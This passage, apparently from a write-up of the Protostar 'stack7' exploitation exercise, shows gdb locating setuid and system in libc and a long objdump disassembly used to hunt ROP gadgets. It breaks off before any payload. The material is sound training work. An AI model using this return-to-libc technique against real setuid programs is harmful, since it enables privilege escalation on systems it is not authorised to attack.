pFirst let's find the addresses of codesetuid/code and codesystem/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangdb -q ./stack7/span span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack7...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go"0x08048545 lt;main+0gt;: push ebp/span/span span class="code-line"span class="go"0x08048546 lt;main+1gt;: mov ebp,esp/span/span span class="code-line"span class="go"0x08048548 lt;main+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go"0x0804854b lt;main+6gt;: call 0x80484c4 lt;getpathgt;/span/span span class="code-line"span class="go"0x08048550 lt;main+11gt;: mov esp,ebp/span/span span class="code-line"span class="go"0x08048552 lt;main+13gt;: pop ebp/span/span span class="code-line"span class="go"0x08048553 lt;main+14gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048545/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048545: file stack7/stack7.c, line 27./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack7 /span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack7/stack7.c:27/span/span span class="code-line"span class="go"27 stack7/stack7.c: No such file or directory./span/span span class="code-line"span class="go" in stack7/stack7.c/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print system/span/span span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7ecffb0 lt;__libc_systemgt;/span span class="code-line"/code/pre/div /td/tr/table pNow we need to find the addresses of our ROP gadgets, the first being just a coderet/code instruction and the second being a codepop [register], ret/code sequence to remove the argument to codesetuid/code before running codesystem/code, although these gadgets will be 1 byte away from each other:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/span span class="code-line"span class="normal"196/span/span span class="code-line"span class="normal"197/span/span span class="code-line"span class="normal"198/span/span span class="code-line"span class="normal"199/span/span span class="code-line"span class="normal"200/span/span span class="code-line"span class="normal"201/span/span span class="code-line"span class="normal"202/span/span span class="code-line"span class="normal"203/span/span span class="code-line"span class="normal"204/span/span span class="code-line"span class="normal"205/span/span span class="code-line"span class="normal"206/span/span span class="code-line"span class="normal"207/span/span span class="code-line"span class="normal"208/span/span span class="code-line"span class="normal"209/span/span span class="code-line"span class="normal"210/span/span span class="code-line"span class="normal"211/span/span span class="code-line"span class="normal"212/span/span span class="code-line"span class="normal"213/span/span span class="code-line"span class="normal"214/span/span span class="code-line"span class="normal"215/span/span span class="code-line"span class="normal"216/span/span span class="code-line"span class="normal"217/span/span span class="code-line"span class="normal"218/span/span span class="code-line"span class="normal"219/span/span span class="code-line"span class="normal"220/span/span span class="code-line"span class="normal"221/span/span span class="code-line"span class="normal"222/span/span span class="code-line"span class="normal"223/span/span span class="code-line"span class="normal"224/span/span span class="code-line"span class="normal"225/span/span span class="code-line"span class="normal"226/span/span span class="code-line"span class="normal"227/span/span span class="code-line"span class="normal"228/span/span span class="code-line"span class="normal"229/span/span span class="code-line"span class="normal"230/span/span span class="code-line"span class="normal"231/span/span span class="code-line"span class="normal"232/span/span span class="code-line"span class="normal"233/span/span span class="code-line"span class="normal"234/span/span span class="code-line"span class="normal"235/span/span span class="code-line"span class="normal"236/span/span span class="code-line"span class="normal"237/span/span span class="code-line"span class="normal"238/span/span span class="code-line"span class="normal"239/span/span span class="code-line"span class="normal"240/span/span span class="code-line"span class="normal"241/span/span span class="code-line"span class="normal"242/span/span span class="code-line"span class="normal"243/span/span span class="code-line"span class="normal"244/span/span span class="code-line"span class="normal"245/span/span span class="code-line"span class="normal"246/span/span span class="code-line"span class="normal"247/span/span span class="code-line"span class="normal"248/span/span span class="code-line"span class="normal"249/span/span span class="code-line"span class="normal"250/span/span span class="code-line"span class="normal"251/span/span span class="code-line"span class="normal"252/span/span span class="code-line"span class="normal"253/span/span span class="code-line"span class="normal"254/span/span span class="code-line"span class="normal"255/span/span span class="code-line"span class="normal"256/span/span span class="code-line"span class="normal"257/span/span span class="code-line"span class="normal"258/span/span span class="code-line"span class="normal"259/span/span span class="code-line"span class="normal"260/span/span span class="code-line"span class="normal"261/span/span span class="code-line"span class="normal"262/span/span span class="code-line"span class="normal"263/span/span span class="code-line"span class="normal"264/span/span span class="code-line"span class="normal"265/span/span span class="code-line"span class="normal"266/span/span span class="code-line"span class="normal"267/span/span span class="code-line"span class="normal"268/span/span span class="code-line"span class="normal"269/span/span span class="code-line"span class="normal"270/span/span span class="code-line"span class="normal"271/span/span span class="code-line"span class="normal"272/span/span span class="code-line"span class="normal"273/span/span span class="code-line"span class="normal"274/span/span span class="code-line"span class="normal"275/span/span span class="code-line"span class="normal"276/span/span span class="code-line"span class="normal"277/span/span span class="code-line"span class="normal"278/span/span span class="code-line"span class="normal"279/span/span span class="code-line"span class="normal"280/span/span span class="code-line"span class="normal"281/span/span span class="code-line"span class="normal"282/span/span span class="code-line"span class="normal"283/span/span span class="code-line"span class="normal"284/span/span span class="code-line"span class="normal"285/span/span span class="code-line"span class="normal"286/span/span span class="code-line"span class="normal"287/span/span span class="code-line"span class="normal"288/span/span span class="code-line"span class="normal"289/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"user@protostar:/opt/protostar/bin$ objdump -d ./stack7 -M intel/span/span span class="code-line"/span span class="code-line"span class="nl"./stack7/spanspan class="p":/span file format span class="s"elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048354/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048354: 55 push ebp/span/span span class="code-line"span class="x" 8048355: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048357: 53 push ebx/span/span span class="code-line"span class="x" 8048358: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 804835b: e8 00 00 00 00 call 8048360 lt;_init+0xcgt;/span/span span class="code-line"span class="x" 8048360: 5b pop ebx/span/span span class="code-line"span class="x" 8048361: 81 c3 dc 13 00 00 add ebx,0x13dc/span/span span class="code-line"span class="x" 8048367: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4]/span/span span class="code-line"span class="x" 804836d: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 804836f: 74 05 je 8048376 lt;_init+0x22gt;/span/span span class="code-line"span class="x" 8048371: e8 1e 00 00 00 call 8048394 lt;__gmon_start__@pltgt;/span/span span class="code-line"span class="x" 8048376: e8 25 01 00 00 call 80484a0 lt;frame_dummygt;/span/span span class="code-line"span class="x" 804837b: e8 50 02 00 00 call 80485d0 lt;__do_global_ctors_auxgt;/span/span span class="code-line"span class="x" 8048380: 58 pop eax/span/span span class="code-line"span class="x" 8048381: 5b pop ebx/span/span span class="code-line"span class="x" 8048382: c9 leave /span/span span class="code-line"span class="x" 8048383: c3 ret /span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048384/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048384: ff 35 40 97 04 08 push DWORD PTR ds:0x8049740/span/span span class="code-line"span class="x" 804838a: ff 25 44 97 04 08 jmp DWORD PTR ds:0x8049744/span/span span class="code-line"span class="x" 8048390: 00 00 add BYTE PTR [eax],al/span/span span class="code-line"span class="x" .../span/span span class="code-line"/span span class="code-line"span class="mh"08048394/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048394: ff 25 48 97 04 08 jmp DWORD PTR ds:0x8049748/span/span span class="code-line"span class="x" 804839a: 68 00 00 00 00 push 0x0/span/span span class="code-line"span class="x" 804839f: e9 e0 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080483a4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"gets@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80483a4: ff 25 4c 97 04 08 jmp DWORD PTR ds:0x804974c/span/span span class="code-line"span class="x" 80483aa: 68 08 00 00 00 push 0x8/span/span span class="code-line"span class="x" 80483af: e9 d0 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080483b4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_start_main@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80483b4: ff 25 50 97 04 08 jmp DWORD PTR ds:0x8049750/span/span span class="code-line"span class="x" 80483ba: 68 10 00 00 00 push 0x10/span/span span class="code-line"span class="x" 80483bf: e9 c0 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080483c4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_exit@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80483c4: ff 25 54 97 04 08 jmp DWORD PTR ds:0x8049754/span/span span class="code-line"span class="x" 80483ca: 68 18 00 00 00 push 0x18/span/span span class="code-line"span class="x" 80483cf: e9 b0 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080483d4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fflush@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80483d4: ff 25 58 97 04 08 jmp DWORD PTR ds:0x8049758/span/span span class="code-line"span class="x" 80483da: 68 20 00 00 00 push 0x20/span/span span class="code-line"span class="x" 80483df: e9 a0 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080483e4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"printf@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80483e4: ff 25 5c 97 04 08 jmp DWORD PTR ds:0x804975c/span/span span class="code-line"span class="x" 80483ea: 68 28 00 00 00 push 0x28/span/span span class="code-line"span class="x" 80483ef: e9 90 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080483f4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strdup@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80483f4: ff 25 60 97 04 08 jmp DWORD PTR ds:0x8049760/span/span span class="code-line"span class="x" 80483fa: 68 30 00 00 00 push 0x30/span/span span class="code-line"span class="x" 80483ff: e9 80 ff ff ff jmp 8048384 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048410/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048410: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048412: 5e pop esi/span/span span class="code-line"span class="x" 8048413: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048415: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048418: 50 push eax/span/span span class="code-line"span class="x" 8048419: 54 push esp/span/span span class="code-line"span class="x" 804841a: 52 push edx/span/span span class="code-line"span class="x" 804841b: 68 60 85 04 08 push 0x8048560/span/span span class="code-line"span class="x" 8048420: 68 70 85 04 08 push 0x8048570/span/span span class="code-line"span class="x" 8048425: 51 push ecx/span/span span class="code-line"span class="x" 8048426: 56 push esi/span/span span class="code-line"span class="x" 8048427: 68 45 85 04 08 push 0x8048545/span/span span class="code-line"span class="x" 804842c: e8 83 ff ff ff call 80483b4 lt;__libc_start_main@pltgt;/span/span span class="code-line"span class="x" 8048431: f4 hlt /span/span span class="code-line"span class="x" 8048432: 90 nop/span/span span class="code-line"span class="x" 8048433: 90 nop/span/span span class="code-line"span class="x" 8048434: 90 nop/span/span span class="code-line"span class="x" 8048435: 90 nop/span/span span class="code-line"span class="x" 8048436: 90 nop/span/span span class="code-line"span class="x" 8048437: 90 nop/span/span span class="code-line"span class="x" 8048438: 90 nop/span/span span class="code-line"span class="x" 8048439: 90 nop/span/span span class="code-line"span class="x" 804843a: 90 nop/span/span span class="code-line"span class="x" 804843b: 90 nop/span/span span class="code-line"span class="x" 804843c: 90 nop/span/span span class="code-line"span class="x" 804843d: 90 nop/span/span span class="code-line"span class="x" 804843e: 90 nop/span/span span class="code-line"span class="x" 804843f: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048440/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048440: 55 push ebp/span/span span class="code-line"span class="x" 8048441: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048443: 53 push ebx/span/span span class="code-line"span class="x" 8048444: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048447: 80 3d 84 97 04 08 00 cmp BYTE PTR ds:0x8049784,0x0/span/span span class="code-line"span class="x" 804844e: 75 3f jne 804848f lt;__do_global_dtors_aux+0x4fgt;/span/span span class="code-line"span class="x" 8048450: a1 88 97 04 08 mov eax,ds:0x8049788/span/span span class="code-line"span class="x" 8048455: bb 60 96 04 08 mov ebx,0x8049660/span/span span class="code-line"span class="x" 804845a: 81 eb 5c 96 04 08 sub ebx,0x804965c/span/span span class="code-line"span class="x" 8048460: c1 fb 02 sar ebx,0x2/span/span span class="code-line"span class="x" 8048463: 83 eb 01 sub ebx,0x1/span/span span class="code-line"span class="x" 8048466: 39 d8 cmp eax,ebx/span/span span class="code-line"span class="x" 8048468: 73 1e jae 8048488 lt;__do_global_dtors_aux+0x48gt;/span/span span class="code-line"span class="x" 804846a: 8d b6 00 00 00 00 lea esi,[esi+0x0]/span/span span class="code-line"span class="x" 8048470: 83 c0 01 add eax,0x1/span/span span class="code-line"span class="x" 8048473: a3 88 97 04 08 mov ds:0x8049788,eax/span/span span class="code-line"span class="x" 8048478: ff 14 85 5c 96 04 08 call DWORD PTR [eax*4+0x804965c]/span/span span class="code-line"span class="x" 804847f: a1 88 97 04 08 mov eax,ds:0x8049788/span/span span class="code-line"span class="x" 8048484: 39 d8 cmp eax,ebx/span/span span class="code-line"span class="x" 8048486: 72 e8 jb 8048470 lt;__do_global_dtors_aux+0x30gt;/span/span span class="code-line"span class="x" 8048488: c6 05 84 97 04 08 01 mov BYTE PTR ds:0x8049784,0x1/span/span span class="code-line"span class="x" 804848f: 83 c4 04 add esp,0x4/span/span span class="code-line"span class="x" 8048492: 5b pop ebx/span/span span class="code-line"span class="x" 8048493: 5d pop ebp/span/span span class="code-line"span class="x" 8048494: c3 ret /span/span span class="code-line"span class="x" 8048495: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048499: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080484a0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80484a0: 55 push ebp/span/span span class="code-line"span class="x" 80484a1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80484a3: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80484a6: a1 64 96 04 08 mov eax,ds:0x8049664/span/span span class="code-line"span class="x" 80484ab: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80484ad: 74 12 je 80484c1 lt;frame_dummy+0x21gt;/span/span span class="code-line"span class="x" 80484af: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80484b4: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80484b6: 74 09 je 80484c1 lt;frame_dummy+0x21gt;/span/span span class="code-line"span class="x" 80484b8: c7 04 24 64 96 04 08 mov DWORD PTR [esp],0x8049664/span/span span class="code-line"span class="x" 80484bf: ff d0 call eax/span/span span class="code-line"span class="x" 80484c1: c9 leave /span/span span class="code-line"span class="x" 80484c2: c3 ret /span/span span class="code-line"span class="x" 80484c3: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080484c4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"getpath/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80484c4: 55 push ebp/span/span span class="code-line"span class="x" 80484c5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80484c7: 83 ec 68 sub esp,0x68/span/span span class="code-line"span class="x" 80484ca: b8 20 86 04 08 mov eax,0x8048620/span/span span class="code-line"span class="x" 80484cf: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80484d2: e8 0d ff ff ff call 80483e4 lt;printf@pltgt;/span/span span class="code-line"span class="x" 80484d7: a1 80 97 04 08 mov eax,ds:0x8049780/span/span span class="code-line"span class="x" 80484dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80484df: e8 f0 fe ff ff call 80483d4 lt;fflush@pltgt;/span/span span class="code-line"span class="x" 80484e4: 8d 45 b4 lea eax,[ebp-0x4c]/span/span span class="code-line"span class="x" 80484e7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80484ea: e8 b5 fe ff ff call 80483a4 lt;gets@pltgt;/span/span span class="code-line"span class="x" 80484ef: 8b 45 04 mov eax,DWORD PTR [ebp+0x4]/span/span span class="code-line"span class="x" 80484f2: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 80484f5: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 80484f8: 25 00 00 00 b0 and eax,0xb0000000/span/span span class="code-line"span class="x" 80484fd: 3d 00 00 00 b0 cmp eax,0xb0000000/span/span span class="code-line"span class="x" 8048502: 75 20 jne 8048524 lt;getpath+0x60gt;/span/span span class="code-line"span class="x" 8048504: b8 34 86 04 08 mov eax,0x8048634/span/span span class="code-line"span class="x" 8048509: 8b 55 f4 mov edx,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 804850c: 89 54 24 04 mov DWORD PTR [esp+0x4],edx/span/span span class="code-line"span class="x" 8048510: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048513: e8 cc fe ff ff call 80483e4 lt;printf@pltgt;/span/span span class="code-line"span class="x" 8048518: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 804851f: e8 a0 fe ff ff call 80483c4 lt;_exit@pltgt;/span/span span class="code-line"span class="x" 8048524: b8 40 86 04 08 mov eax,0x8048640/span/span span class="code-line"span class="x" 8048529: 8d 55 b4 lea edx,[ebp-0x4c]/span/span span class="code-line"span class="x" 804852c: 89 54 24 04 mov DWORD PTR [esp+0x4],edx/span/span span class="code-line"span class="x" 8048530: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048533: e8 ac fe ff ff call 80483e4 lt;printf@pltgt;/span/span span class="code-line"span class="x" 8048538: 8d 45 b4 lea eax,[ebp-0x4c]/span/span span class="code-line"span class="x" 804853b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 804853e: e8 b1 fe ff ff call 80483f4 lt;strdup@pltgt;/span/span span class="code-line"span class="x" 8048543: c9 leave /span/span span class="code-line"span class="x" 8048544: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048545/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048545: 55 push ebp/span/span span class="code-line"span class="x" 8048546: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048548: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 804854b: e8 74 ff ff ff call 80484c4 lt;getpathgt;/span/span span class="code-line"span class="x" 8048550: 89 ec mov esp,ebp/span/span span class="code-line"span class="x" 8048552: 5d pop ebp/span/span span class="code-line"span class="x" 8048553: c3 ret /span/span span class="code-line"span class="x" 8048554: 90 nop/span/span span class="code-line"span class="x" 8048555: 90 nop/span/span span class="code-line"span class="x" 8048556: 90 nop/span/span span class="code-line"span class="x" 8048557: 90 nop/span/span span class="code-line"span class="x" 8048558: 90 nop/span/span span class="code-line"span class="x" 8048559: 90 nop/span/span span class="code-line"span class="x" 804855a: 90 nop/span/span span class="code-line"span class="x" 804855b: 90 nop/span/span span class="code-line"span class="x" 804855c: 90 nop/span/span span class="code-line"span class="x" 804855d: 90 nop/span/span span class="code-line"span class="x" 804855e: 90 nop/span/span span class="code-line"span class="x" 804855f: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048560/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan 